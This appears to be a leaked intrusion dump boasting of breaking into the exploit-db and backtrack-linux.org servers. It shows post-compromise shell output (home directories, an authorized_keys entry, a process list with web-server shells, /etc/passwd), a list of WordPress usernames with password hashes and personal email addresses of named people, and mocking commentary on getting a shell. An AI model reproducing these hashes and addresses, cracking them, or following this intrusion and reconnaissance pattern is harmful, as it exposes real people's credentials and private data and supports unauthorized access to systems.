# Don't read the user's ~/.rhosts and ~/.shosts files
IgnoreRhosts yes
# For this to work you will also need host keys in /etc/ssh_known_hosts
RhostsRSAAuthentication no
# similar for protocol version 2
HostbasedAuthentication no
# Uncomment if you don't trust ~/.ssh/known_hosts for RhostsRSAAuthentication
#IgnoreUserKnownHosts yes

# To enable empty passwords, change to yes (NOT RECOMMENDED)
PermitEmptyPasswords no

# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication no

# Change to no to disable tunnelled clear text passwords
PasswordAuthentication yes

# Kerberos options
#KerberosAuthentication no
#KerberosGetAFSToken no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes

# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes

X11Forwarding yes
X11DisplayOffset 10
PrintMotd no
PrintLastLog yes
TCPKeepAlive yes
#UseLogin no

#MaxStartups 10:30:60
#Banner /etc/issue.net

# Allow client to pass locale environment variables
AcceptEnv LANG LC_*

Subsystem sftp /usr/lib/openssh/sftp-server

# Set this to 'yes' to enable PAM authentication, account processing,
# and session processing. If this is enabled, PAM authentication will
# be allowed through the ChallengeResponseAuthentication and
# PasswordAuthentication. Depending on your PAM configuration,
# PAM authentication via ChallengeResponseAuthentication may bypass
# the setting of "PermitRootLogin without-password".
# If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and ChallengeResponseAuthentication to 'no'.
UsePAM yes

$ cd /home

$ ls -la
total 12
drwxr-xr-x 3 root root 4096 Aug 3 11:48 .
drwxr-xr-x 26 root root 4096 Nov 30 06:53 ..
drwxr-xr-x 7 emgent emgent 4096 Aug 7 07:45 emgent

$ cd emgent

$ ls -la
total 48
drwxr-xr-x 7 emgent emgent 4096 Aug 7 07:45 .
drwxr-xr-x 3 root root 4096 Aug 3 11:48 ..
-rw------- 1 emgent emgent 259 Oct 18 11:39 .bash_history
-rw-r--r-- 1 emgent emgent 220 Aug 3 11:48 .bash_logout
-rw-r--r-- 1 emgent emgent 3103 Aug 3 11:48 .bashrc
drwx------ 2 emgent emgent 4096 Aug 3 11:49 .cache
drwx------ 2 emgent emgent 4096 Aug 3 11:49 .irssi
-rw------- 1 emgent emgent 9 Aug 3 11:50 .nano_history
-rw-r--r-- 1 emgent emgent 675 Aug 3 11:48 .profile
drwxr-xr-x 2 emgent emgent 4096 Aug 3 11:49 .ssh
drwxr-xr-x 3 emgent emgent 4096 Aug 7 07:45 .subversion
drwxr-xr-x 4 emgent emgent 4096 Aug 7 07:46 exploitdb



$ cd .ssh

$ ls
authorized_keys
cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAntXlep19oECqVocmK6UIhsxI5yGQSPUVYWOZXWO7Q0wP9vF5FfHmE4yCmKt+MleWcPWkkbI6IXBt9TNtw7m6usPx2IEbpEVr8sl7pT8hiW8tKNew74gEEgE53AGLhWr/+vViL+5K4SKCt591oABDtWA6KIEOuyx9/jqLLwBTQP0UyrqIJpR9VhQ2GQ6tN6Y+LV4tvpqy8ehevsIqdj+HvdsvVU2sREJsSH5xAncaRJQ1sfQepyeAwi7yZ1fBT4U4/LlukkBLIqjXk2D6jPZG870R4KCEI280rBJ9DX4fPX9qvYUwOm/OtWwxC7kivuCnNM1v2wBRUVCBmSUimqWnpQ== emgent@enJoy

$ ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 23680 1244 ? Ss Nov11 0:07 /sbin/init
root 2 0.0 0.0 0 0 ? S Nov11 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S Nov11 0:01 [migration/0]
root 4 0.0 0.0 0 0 ? S Nov11 0:12 [ksoftirqd/0]
root 5 0.0 0.0 0 0 ? S Nov11 0:00 [watchdog/0]
root 6 0.0 0.0 0 0 ? S Nov11 0:02 [migration/1]
root 7 0.0 0.0 0 0 ? S Nov11 0:04 [ksoftirqd/1]
root 8 0.0 0.0 0 0 ? S Nov11 0:00 [watchdog/1]
root 9 0.0 0.0 0 0 ? S Nov11 0:02 [migration/2]
root 10 0.0 0.0 0 0 ? S Nov11 0:02 [ksoftirqd/2]
root 11 0.0 0.0 0 0 ? S Nov11 0:00 [watchdog/2]
root 12 0.0 0.0 0 0 ? S Nov11 0:01 [migration/3]
root 13 0.0 0.0 0 0 ? S Nov11 0:05 [ksoftirqd/3]
root 14 0.0 0.0 0 0 ? S Nov11 0:00 [watchdog/3]
root 15 0.0 0.0 0 0 ? S Nov11 0:32 [events/0]
root 16 0.0 0.0 0 0 ? S Nov11 13:44 [events/1]
root 17 0.0 0.0 0 0 ? S Nov11 0:17 [events/2]
root 18 0.0 0.0 0 0 ? S Nov11 0:18 [events/3]
root 19 0.0 0.0 0 0 ? S Nov11 0:00 [cpuset]
root 20 0.0 0.0 0 0 ? S Nov11 0:00 [khelper]
root 21 0.0 0.0 0 0 ? S Nov11 0:00 [netns]
root 22 0.0 0.0 0 0 ? S Nov11 0:00 [async/mgr]
root 23 0.0 0.0 0 0 ? S Nov11 0:00 [pm]
root 25 0.0 0.0 0 0 ? S Nov11 0:02 [sync_supers]
root 26 0.0 0.0 0 0 ? S Nov11 0:04 [bdi-default]
root 27 0.0 0.0 0 0 ? S Nov11 0:00 [kintegrityd/0]
root 28 0.0 0.0 0 0 ? S Nov11 0:00 [kintegrityd/1]
root 29 0.0 0.0 0 0 ? S Nov11 0:00 [kintegrityd/2]
root 30 0.0 0.0 0 0 ? S Nov11 0:00 [kintegrityd/3]
root 31 0.0 0.0 0 0 ? S Nov11 11:09 [kblockd/0]
root 32 0.0 0.0 0 0 ? S Nov11 2:17 [kblockd/1]
root 33 0.0 0.0 0 0 ? S Nov11 1:33 [kblockd/2]
root 34 0.0 0.0 0 0 ? S Nov11 1:14 [kblockd/3]
root 35 0.0 0.0 0 0 ? S Nov11 0:00 [kacpid]
root 36 0.0 0.0 0 0 ? S Nov11 0:00 [kacpi_notify]
root 37 0.0 0.0 0 0 ? S Nov11 0:00 [kacpi_hotplug]
root 38 0.0 0.0 0 0 ? S Nov11 0:00 [ata/0]
root 39 0.0 0.0 0 0 ? S Nov11 0:00 [ata/1]
root 40 0.0 0.0 0 0 ? S Nov11 0:00 [ata/2]
root 41 0.0 0.0 0 0 ? S Nov11 0:00 [ata/3]
root 42 0.0 0.0 0 0 ? S Nov11 0:00 [ata_aux]
root 43 0.0 0.0 0 0 ? S Nov11 0:00 [ksuspend_usbd]
root 44 0.0 0.0 0 0 ? S Nov11 0:00 [khubd]
root 45 0.0 0.0 0 0 ? S Nov11 0:00 [kseriod]
root 46 0.0 0.0 0 0 ? S Nov11 0:00 [kmmcd]
root 51 0.0 0.0 0 0 ? S Nov11 0:00 [khungtaskd]
root 52 0.0 0.0 0 0 ? S Nov11 0:30 [kswapd0]
root 53 0.0 0.0 0 0 ? SN Nov11 0:00 [ksmd]
root 54 0.0 0.0 0 0 ? S Nov11 0:00 [aio/0]
root 55 0.0 0.0 0 0 ? S Nov11 0:00 [aio/1]
root 56 0.0 0.0 0 0 ? S Nov11 0:00 [aio/2]
root 57 0.0 0.0 0 0 ? S Nov11 0:00 [aio/3]
root 58 0.0 0.0 0 0 ? S Nov11 0:00 [ecryptfs-kthrea]
root 59 0.0 0.0 0 0 ? S Nov11 0:00 [crypto/0]
root 60 0.0 0.0 0 0 ? S Nov11 0:00 [crypto/1]
root 61 0.0 0.0 0 0 ? S Nov11 0:00 [crypto/2]
root 62 0.0 0.0 0 0 ? S Nov11 0:00 [crypto/3]
root 65 0.0 0.0 0 0 ? S Nov11 0:00 [pciehpd]
root 66 0.0 0.0 0 0 ? S Nov11 0:00 [scsi_eh_0]
root 67 0.0 0.0 0 0 ? S Nov11 0:00 [scsi_eh_1]
root 69 0.0 0.0 0 0 ? S Nov11 0:00 [kstriped]
root 70 0.0 0.0 0 0 ? S Nov11 0:00 [kmpathd/0]
root 71 0.0 0.0 0 0 ? S Nov11 0:00 [kmpathd/1]
root 72 0.0 0.0 0 0 ? S Nov11 0:00 [kmpathd/2]
root 73 0.0 0.0 0 0 ? S Nov11 0:00 [kmpathd/3]
root 74 0.0 0.0 0 0 ? S Nov11 0:00 [kmpath_handlerd]
root 75 0.0 0.0 0 0 ? S Nov11 0:00 [ksnapd]
root 76 0.0 0.0 0 0 ? S Nov11 0:00 [kondemand/0]
root 77 0.0 0.0 0 0 ? S Nov11 0:00 [kondemand/1]
root 78 0.0 0.0 0 0 ? S Nov11 0:00 [kondemand/2]
root 79 0.0 0.0 0 0 ? S Nov11 0:00 [kondemand/3]
root 80 0.0 0.0 0 0 ? S Nov11 0:00 [kconservative/0]
root 81 0.0 0.0 0 0 ? S Nov11 0:00 [kconservative/1]
root 82 0.0 0.0 0 0 ? S Nov11 0:00 [kconservative/2]
root 83 0.0 0.0 0 0 ? S Nov11 0:00 [kconservative/3]
root 191 0.0 0.0 0 0 ? S Nov11 1:03 [mpt_poll_0]
root 192 0.0 0.0 0 0 ? S Nov11 0:00 [mpt/0]
root 268 0.0 0.0 0 0 ? S Nov11 0:00 [scsi_eh_2]
root 285 0.3 0.0 0 0 ? S Nov11 125:09 [jbd2/sda1-8]
root 286 0.0 0.0 0 0 ? S Nov11 0:00 [ext4-dio-unwrit]
root 287 0.0 0.0 0 0 ? S Nov11 0:00 [ext4-dio-unwrit]
root 288 0.0 0.0 0 0 ? S Nov11 0:00 [ext4-dio-unwrit]
root 289 0.0 0.0 0 0 ? S Nov11 0:00 [ext4-dio-unwrit]
root 322 0.3 0.0 0 0 ? S Nov11 115:40 [flush-8:0]
root 347 0.0 0.0 16904 640 ? S Nov11 0:00 upstart-udev-bridge --daemon
root 363 0.0 0.0 16920 416 ? S<s Nov11 0:00 udevd --daemon
root 582 0.0 0.0 0 0 ? S Nov11 0:00 [kpsmoused]
syslog 714 0.0 0.0 191492 1148 ? Sl Nov11 3:22 rsyslogd -c4
root 732 0.0 0.0 49260 528 ? Ss Nov11 0:01 /usr/sbin/sshd
root 773 0.0 0.0 6080 284 tty4 Ss+ Nov11 0:00 /sbin/getty -8 38400 tty4
root 777 0.0 0.0 6080 284 tty5 Ss+ Nov11 0:00 /sbin/getty -8 38400 tty5
root 787 0.0 0.0 6080 284 tty2 Ss+ Nov11 0:00 /sbin/getty -8 38400 tty2
root 788 0.0 0.0 6080 284 tty3 Ss+ Nov11 0:00 /sbin/getty -8 38400 tty3
root 792 0.0 0.0 6080 284 tty6 Ss+ Nov11 0:00 /sbin/getty -8 38400 tty6
root 806 0.0 0.0 21076 428 ? Ss Nov11 0:07 cron
daemon 807 0.0 0.0 18884 348 ? Ss Nov11 0:00 atd
root 817 0.0 0.0 11284 428 ? Ss Nov11 1:53 /usr/sbin/irqbalance
root 950 0.0 0.0 84384 848 ? Ss Nov11 1:24 sendmail: MTA: accepting connections
root 1318 0.0 0.0 53108 4076 ? Sl Nov11 7:28 /usr/bin/python /usr/bin/fail2ban-server -b -s /var/run/fail2ban/fail2ban.sock
root 1354 0.0 0.0 97040 408 ? Ss Nov11 0:07 /usr/bin/svnserve -d -r /var/svn/
root 1357 0.0 0.0 6080 284 tty1 Ss+ Nov11 0:00 /sbin/getty -8 38400 tty1
root 3467 0.0 0.0 0 0 ? S Nov30 0:00 [xfs_mru_cache]
root 3468 0.0 0.0 0 0 ? S Nov30 0:00 [xfslogd/0]
root 3469 0.0 0.0 0 0 ? S Nov30 0:00 [xfslogd/1]
root 3470 0.0 0.0 0 0 ? S Nov30 0:00 [xfslogd/2]
root 3471 0.0 0.0 0 0 ? S Nov30 0:00 [xfslogd/3]
root 3472 0.0 0.0 0 0 ? S Nov30 0:00 [xfsdatad/0]
root 3473 0.0 0.0 0 0 ? S Nov30 0:00 [xfsdatad/1]
root 3474 0.0 0.0 0 0 ? S Nov30 0:00 [xfsdatad/2]
root 3475 0.0 0.0 0 0 ? S Nov30 0:00 [xfsdatad/3]
root 3476 0.0 0.0 0 0 ? S Nov30 0:00 [xfsconvertd/0]
root 3477 0.0 0.0 0 0 ? S Nov30 0:00 [xfsconvertd/1]
root 3478 0.0 0.0 0 0 ? S Nov30 0:00 [xfsconvertd/2]
root 3479 0.0 0.0 0 0 ? S Nov30 0:00 [xfsconvertd/3]
root 3489 0.0 0.0 16980 372 ? S< Nov30 0:00 udevd --daemon
root 3490 0.0 0.0 16980 376 ? S< Nov30 0:00 udevd --daemon
root 3491 0.0 0.0 0 0 ? S Nov30 0:00 [jfsIO]
root 3492 0.0 0.0 0 0 ? S Nov30 0:00 [jfsCommit]
root 3493 0.0 0.0 0 0 ? S Nov30 0:00 [jfsCommit]
root 3494 0.0 0.0 0 0 ? S Nov30 0:00 [jfsCommit]
root 3495 0.0 0.0 0 0 ? S Nov30 0:00 [jfsCommit]
root 3496 0.0 0.0 0 0 ? S Nov30 0:00 [jfsSync]
root 4114 0.0 0.0 107552 1928 ? S Nov23 0:00 /usr/bin/svnserve -d -r /var/svn/
root 7702 0.0 0.0 107420 1960 ? S 13:31 0:00 /usr/bin/svnserve -d -r /var/svn/
root 8080 0.1 0.1 346236 11548 ? Ss Nov26 18:14 /usr/sbin/apache2 -k start
root 9853 0.0 0.0 9756 384 ? Ss Nov11 1:04 tail -f /var/log/apache2/jesys.log
www-data 10874 0.0 0.6 354384 38764 ? S 14:15 0:00 /usr/sbin/apache2 -k start
www-data 10909 0.0 0.0 25632 2876 ? S 14:15 0:00 dhcpcd
www-data 10910 0.0 0.0 4096 656 ? S 14:15 0:00 /bin/sh
www-data 13491 0.1 0.6 356496 39580 ? S 14:54 0:01 /usr/sbin/apache2 -k start
root 13493 0.1 0.1 116628 11268 ? S 14:54 0:00 /usr/bin/svnserve -d -r /var/svn/
www-data 13510 0.0 0.0 4040 524 ? S 14:55 0:00 cat www.tar.gz
root 13561 0.0 0.0 107420 1940 ? S Nov30 0:00 /usr/bin/svnserve -d -r /var/svn/
www-data 13681 0.1 0.5 354240 32356 ? S 14:57 0:00 /usr/sbin/apache2 -k start
www-data 13884 0.1 0.5 354792 33064 ? S 14:59 0:00 /usr/sbin/apache2 -k start
www-data 13889 0.2 0.5 353632 31568 ? S 14:59 0:01 /usr/sbin/apache2 -k start
www-data 13960 0.0 0.6 354384 38812 ? S 15:01 0:00 /usr/sbin/apache2 -k start
www-data 13976 0.2 0.5 355192 32200 ? S 15:01 0:00 /usr/sbin/apache2 -k start
www-data 14022 0.0 0.0 25632 2876 ? S 15:02 0:00 dhcpcd
www-data 14023 0.0 0.0 4096 628 ? S 15:02 0:00 /bin/sh
www-data 14026 0.2 0.5 353888 33228 ? S 15:02 0:00 /usr/sbin/apache2 -k start
www-data 14027 0.1 0.5 356512 32860 ? S 15:02 0:00 /usr/sbin/apache2 -k start
www-data 14062 0.2 0.5 353548 32144 ? S 15:03 0:00 /usr/sbin/apache2 -k start
www-data 14063 0.1 0.5 353644 30840 ? S 15:03 0:00 /usr/sbin/apache2 -k start
www-data 14152 0.2 0.5 353376 31236 ? S 15:04 0:00 /usr/sbin/apache2 -k start
www-data 14154 0.3 0.5 352856 31284 ? S 15:04 0:00 /usr/sbin/apache2 -k start
www-data 14159 0.1 0.5 353888 30852 ? S 15:04 0:00 /usr/sbin/apache2 -k start
www-data 14160 0.2 0.5 355332 31280 ? S 15:04 0:00 /usr/sbin/apache2 -k start
www-data 14163 0.1 0.5 354204 31520 ? S 15:04 0:00 /usr/sbin/apache2 -k start
www-data 14183 0.1 0.4 353804 30404 ? S 15:05 0:00 /usr/sbin/apache2 -k start
www-data 14185 0.2 0.4 352724 30460 ? S 15:05 0:00 /usr/sbin/apache2 -k start
www-data 14188 0.2 0.5 353544 32600 ? S 15:05 0:00 /usr/sbin/apache2 -k start
www-data 14194 0.1 0.4 353880 30564 ? S 15:05 0:00 /usr/sbin/apache2 -k start
www-data 14201 0.1 0.5 353500 31264 ? S 15:05 0:00 /usr/sbin/apache2 -k start
www-data 14204 0.2 0.5 354516 32044 ? S 15:05 0:00 /usr/sbin/apache2 -k start
www-data 14205 0.1 0.4 353360 29148 ? S 15:05 0:00 /usr/sbin/apache2 -k start
ossecm 14276 0.0 0.0 16844 644 ? S Dec02 0:01 /var/ossec/bin/ossec-maild
root 14286 0.0 0.0 12496 576 ? S Dec02 0:03 /var/ossec/bin/ossec-execd
ossec 14291 0.0 0.0 14924 3052 ? S Dec02 0:43 /var/ossec/bin/ossec-analysisd
root 14295 0.0 0.0 4236 584 ? S Dec02 0:22 /var/ossec/bin/ossec-logcollector
www-data 14315 0.0 0.4 352972 29480 ? S 15:05 0:00 /usr/sbin/apache2 -k start
www-data 14316 0.2 0.5 353360 31168 ? S 15:05 0:00 /usr/sbin/apache2 -k start
www-data 14317 0.1 0.5 354404 30832 ? S 15:05 0:00 /usr/sbin/apache2 -k start
www-data 14345 0.2 0.4 352592 30052 ? S 15:07 0:00 /usr/sbin/apache2 -k start
www-data 14346 0.1 0.4 354008 30416 ? S 15:07 0:00 /usr/sbin/apache2 -k start
www-data 14348 0.1 0.4 352356 29156 ? S 15:07 0:00 /usr/sbin/apache2 -k start
www-data 14350 0.0 0.1 347492 10892 ? S 15:07 0:00 /usr/sbin/apache2 -k start
www-data 14351 0.1 0.4 353272 30452 ? S 15:07 0:00 /usr/sbin/apache2 -k start
www-data 14352 0.3 0.5 354176 31516 ? S 15:07 0:00 /usr/sbin/apache2 -k start
www-data 14355 0.3 0.4 352328 29492 ? S 15:07 0:00 /usr/sbin/apache2 -k start
www-data 14356 0.2 0.5 354200 31508 ? S 15:07 0:00 /usr/sbin/apache2 -k start
www-data 14357 0.0 0.4 352584 28180 ? S 15:07 0:00 /usr/sbin/apache2 -k start
root 14361 0.0 0.0 4996 1664 ? S Dec02 0:34 /var/ossec/bin/ossec-syscheckd
ossec 14365 0.0 0.0 12764 844 ? S Dec02 0:00 /var/ossec/bin/ossec-monitord
www-data 14366 0.2 0.4 352348 29836 ? S 15:07 0:00 /usr/sbin/apache2 -k start
www-data 14367 0.1 0.4 353492 30468 ? S 15:07 0:00 /usr/sbin/apache2 -k start
www-data 14369 0.1 0.4 353424 30616 ? S 15:07 0:00 /usr/sbin/apache2 -k start
www-data 14370 0.1 0.5 356216 31440 ? S 15:07 0:00 /usr/sbin/apache2 -k start
www-data 14371 0.2 0.5 353996 31636 ? S 15:07 0:00 /usr/sbin/apache2 -k start
www-data 14372 0.1 0.4 352356 28228 ? S 15:07 0:00 /usr/sbin/apache2 -k start
www-data 14377 0.0 0.1 347236 10808 ? S 15:07 0:00 /usr/sbin/apache2 -k start
www-data 14378 0.2 0.4 352612 29308 ? S 15:07 0:00 /usr/sbin/apache2 -k start
root 14386 0.0 0.0 0 0 ? Z 15:07 0:00 [host-deny.sh] <defunct>
root 14387 0.0 0.0 0 0 ? Z 15:07 0:00 [firewall-drop.s] <defunct>
www-data 14407 0.4 0.5 354384 32672 ? S 15:07 0:00 /usr/sbin/apache2 -k start
www-data 14408 0.1 0.4 352604 29276 ? S 15:07 0:00 /usr/sbin/apache2 -k start
www-data 14412 0.3 0.5 354716 32420 ? S 15:08 0:00 /usr/sbin/apache2 -k start
www-data 14413 0.4 0.4 352592 29272 ? S 15:08 0:00 /usr/sbin/apache2 -k start
www-data 14414 0.2 0.4 352600 28200 ? S 15:08 0:00 /usr/sbin/apache2 -k start
www-data 14415 0.3 0.4 352724 29088 ? S 15:08 0:00 /usr/sbin/apache2 -k start
www-data 14416 0.2 0.4 353776 29452 ? S 15:08 0:00 /usr/sbin/apache2 -k start
www-data 14417 0.2 0.4 353136 28616 ? S 15:08 0:00 /usr/sbin/apache2 -k start
www-data 14418 0.3 0.4 353520 29500 ? S 15:08 0:00 /usr/sbin/apache2 -k start
www-data 14419 0.7 0.0 0 0 ? Z 15:08 0:00 [apache2] <defunct>
www-data 14420 0.5 0.5 353976 31084 ? S 15:08 0:00 /usr/sbin/apache2 -k start
www-data 14421 0.3 0.4 353252 29180 ? S 15:08 0:00 /usr/sbin/apache2 -k start
www-data 14422 0.0 0.1 346724 8076 ? S 15:08 0:00 /usr/sbin/apache2 -k start
www-data 14423 0.6 0.5 354352 31720 ? S 15:08 0:00 /usr/sbin/apache2 -k start
www-data 14424 0.4 0.4 353808 29848 ? S 15:08 0:00 /usr/sbin/apache2 -k start
www-data 14425 0.3 0.4 352584 28252 ? S 15:08 0:00 /usr/sbin/apache2 -k start
www-data 14426 0.1 0.1 346748 10564 ? S 15:08 0:00 /usr/sbin/apache2 -k start
www-data 14427 0.6 0.4 352976 28944 ? S 15:08 0:00 /usr/sbin/apache2 -k start
www-data 14428 0.0 0.1 346724 8204 ? S 15:08 0:00 /usr/sbin/apache2 -k start
www-data 14429 0.0 0.1 346724 8196 ? S 15:08 0:00 /usr/sbin/apache2 -k start
www-data 14430 0.7 0.4 352976 29032 ? S 15:08 0:00 /usr/sbin/apache2 -k start
www-data 14431 0.9 0.4 353668 30120 ? S 15:08 0:00 /usr/sbin/apache2 -k start
www-data 14432 0.9 0.4 353368 29668 ? S 15:08 0:00 /usr/sbin/apache2 -k start
www-data 14433 0.8 0.4 352976 28836 ? S 15:08 0:00 /usr/sbin/apache2 -k start
www-data 14435 1.3 0.4 352716 29364 ? S 15:08 0:00 /usr/sbin/apache2 -k start
www-data 14436 1.8 0.4 353736 30320 ? S 15:08 0:00 /usr/sbin/apache2 -k start
www-data 14437 0.1 0.1 346236 7760 ? S 15:08 0:00 /usr/sbin/apache2 -k start
www-data 14438 0.0 0.0 14976 1116 ? R 15:08 0:00 ps aux
root 19786 0.0 0.0 107420 1884 ? S Nov16 0:00 /usr/bin/svnserve -d -r /var/svn/
root 19983 0.0 0.0 107420 1940 ? S Nov29 0:00 /usr/bin/svnserve -d -r /var/svn/
root 19989 0.0 0.0 107420 1884 ? S Nov16 0:00 /usr/bin/svnserve -d -r /var/svn/
root 20015 0.0 0.0 107420 1884 ? S Nov16 0:00 /usr/bin/svnserve -d -r /var/svn/
root 20286 0.0 0.0 107420 1888 ? S Nov18 0:00 /usr/bin/svnserve -d -r /var/svn/
mysql 22394 10.4 24.9 2441860 1529604 ? Ssl Nov12 3357:17 /usr/sbin/mysqld

$ df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda1 48G 17G 29G 37% /
none 3.0G 172K 3.0G 1% /dev
none 3.0G 0 3.0G 0% /dev/shm
none 3.0G 56K 3.0G 1% /var/run
none 3.0G 0 3.0G 0% /var/lock
none 3.0G 0 3.0G 0% /lib/init/rw
none 48G 17G 29G 37% /var/lib/ureadahead/debugfs

Wordpress:
admin:$P$B./Y8qG9A2YuqIz4uBAjFRo.9Yv0Fb1::muts@offsec.com
dookie2000ca:$P$B7YVdu0JG/JOf2YAS8WsmQqHnZHf.b/:dookie2000ca:dookie@exploit-db.com
innrwrld:$P$BaJi4YkAt5o/paWUfDMdOOWuqHx/is/:innrwrld:innrwrld@exploit-db.com
ivan:$P$B/YVWEkaYIq3s2QLSmVB/wvXWYqoM80::centaur.mail@gmail.com
sinn3r:$P$BYzu/ozErhWi8hB8IPFdr6Tv2R9rat/:3r:sinn3r@exploit-db.com
loneferret:$P$Bgsl0.nlu4De51qkI8MDoeHDS6iLcM1:loneferret:loneferret@exploit-db.com
ronin:$P$BFw9OFuWa1s/t5DUJwKO6A0Otfkewo0::ronin@exploit-db.com
dijital1:$P$BirOcybWYDo/Z/wrJ5zBq2zaGElV.f/:dijital1:rlh@ciphermonk.net
emgent:$P$BYiha9WKXDzXQm8A8RXboRc7zZuus0.::emgent@backtrack-linux.org
j0fer:$P$Bgtsc7w.Vb6mCkJfJi7JkSO5zJUEBY.::j0fer@exploit-db.com
ReL1K:$P$B6DyRPNYrBuC.WRv5GrDnFg3wAQPo91::kennedyd013@gmail.com
Xpl0it:$P$BGBdVhFBaUM8s9ooGcmB01t.zoK.0V0::mr.xpl0it@gmail.com
fdiskyou:$P$BlgwWd3EmVg4SsfIxzOjqUQfGKfLZD0:fdiskyou:rui@exploit-db.com
rawjaw:$P$Bovffv59pNKpCOOvKlbGqFOmAh.HKb0::rawjaw@exploit-db.com
djokica:$P$BNeyg6NPYJWO9fzjfZs1okvMiM0vq51::centaur@pavko.info
xxDigiPxx:$P$B2eEGgTNsZnM4DFpIr4kNrKXv.ivyg/:xxdigipxx:xxtwistedpairxx@comcast.net
muts:$P$Bn.MAuG.OlZ1NtTxq0WWAUwhVEfusC.::muts@offensive-security.com
Ryujin:$P$BZ75UnhRqkJZj82bWfXbeD6dVxzXTG0::ryujin@offsec.com
didn0t:$P$BkGM.gSmmmuDlkJUKjCzy1LfUn9AnS.::paul@pizza.org
zelik:$P$BYjCAaqW0tcdNV3MZviRZoN./.HMKn0::tal.zeltzer@gmail.com
bitform:$P$BLk7y3.7JTn12lRYj25A/JXJ1W0SIA1::mattgraeber@gmail.com
bolexxx:$P$B1liji1bDZoOOwnVwV3Aa59Mqux0FC1::bolexxx@offsec.com
h00die:$P$Behl/g/GHQo5zxciUMgjPPzu7ZI8nO/::ragecyr@exploit-db.com
MaXe:$P$B6PKmgTlcm5L5kpysXfksmEmRfMy6U.::MaXe@intern0t.net
marked_doe:$P$By1rR96ByDsyil/yQa79qBE/A7nbOA1:marked_doe:marc@doudiet.net
code0wnz:$P$Bw1OuJHHzMtUBd8oSjmFoQYKtzjaC..:code0wnz:code0wnz@gmail.com
Dr_IDE:$P$BR.ReeHZDabreI8G0D5NARv8oY6SOP/::dr_ide@hushmail.com
Sud0:$P$BqovGmeqOSCzsHFso9q4goSZ4hkWbK1: :Sud0.x90@gmail.com
TecR0c:$P$BXoaJm6vL1VKJWz.K3m1M.XXVoXU9K/::tecr0c@corelan.be
kripthor:$P$BpUEGtZ3PvzfYotKDvvRA1AU9U4.iq1:kripthor:umbelino@crazydog.pt
ryp:$P$BwQ3FGe9q7spL3vkhxTyYMBkL4UGOQ.::adam@rypmarketing.com
fdisk:$P$Blv3X9wG6b/Yo3SDi22/nIJ34t2jGi/::ruifilipe.reis@gmail.com
root-boy:$P$BWq8dOxSe/HKG/kE3cXpGyAOgR6F.n1:root-boy:root-boy@exploit-db.com

,_._._._._._._._|____________________________________________________
|_|_|_|_|_|_|_|_|___________________________________________________/
~ backtrack ~ !

Since we already tapped into exploit-db and their server lies in the
same subnet with backtrack, we decided to check out their mad
security. Backtrack is run by muts, the same guy who also administers
exploit-db, so no wonder why it was super easy to get a shell...


$ uname -a
Linux backtrack-linux.org 2.6.32.26-175.fc12.x86_64 #1 SMP Wed Dec 1 21:39:34 UTC 2010 x86_64 x86_64 x86_64 GNU/Linux

$ id
uid=48(apache) gid=494(apache) groups=494(apache) context=unconfined_u:system_r:httpd_t:s0

$ alias ls="ls -la"

$ ls
total 110
dr-xr-xr-x. 25 root root 4096 Dec 7 08:42 .
dr-xr-xr-x. 25 root root 4096 Dec 7 08:42 ..
-rw-r--r--. 1 root root 0 Dec 7 08:42 .autofsck
drwx------. 2 root root 4096 Dec 10 03:40 backup
dr-xr-xr-x. 2 root root 4096 Nov 29 19:59 bin
dr-xr-xr-x. 5 root root 1024 Dec 7 08:41 boot
drwxr-xr-x.

  
17 root root 3580 Dec 7 08:43 dev
drwxr-xr-x. 66 root root 4096 Dec 7 08:42 etc
drwxr-xr-x. 3 root root 4096 Aug 14 20:50 home
dr-xr-xr-x. 9 root root 4096 Aug 11 04:01 lib
dr-xr-xr-x. 9 root root 12288 Nov 29 20:00 lib64
drwx------. 2 root root 16384 Aug 11 02:01 lost+found
drwxr-xr-x. 2 root root 4096 Aug 11 04:42 maint
drwxr-xr-x. 2 root root 4096 Aug 25 2009 media
drwxr-xr-x. 2 root root 4096 Aug 25 2009 mnt
drwxr-xr-x. 2 root root 4096 Aug 25 2009 opt
dr-xr-xr-x. 160 root root 0 Dec 7 08:42 proc
drwxr-xr-x. 5 root root 4096 Dec 3 17:16 recovery
dr-xr-x---. 4 root root 4096 Dec 10 08:50 root
dr-xr-xr-x. 2 root root 12288 Nov 29 19:59 sbin
drwxr-xr-x. 7 root root 0 Dec 7 08:42 selinux
drwxr-xr-x. 2 root root 4096 Aug 25 2009 srv
drwxr-xr-x. 13 root root 0 Dec 7 08:42 sys
drwxrwxrwt. 4 root root 4096 Dec 10 14:08 tmp
drwxr-xr-x. 14 root root 4096 Aug 11 02:03 usr
drwxr-xr-x. 20 root root 4096 Aug 14 20:45 var


$ cat /etc/issue
Fedora release 12 (Constantine)
Kernel \r on an \m (\l)

$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:499:virtual console memory owner:/dev:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
mailnull:x:47:497::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:496::/var/spool/mqueue:/sbin/nologin
sshd:x:74:495:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
apache:x:48:494:Apache:/var/www:/sbin/nologin
mysql:x:27:493:MySQL Server:/var/lib/mysql:/bin/bash
ossec:x:500:500::/var/ossec:/sbin/nologin
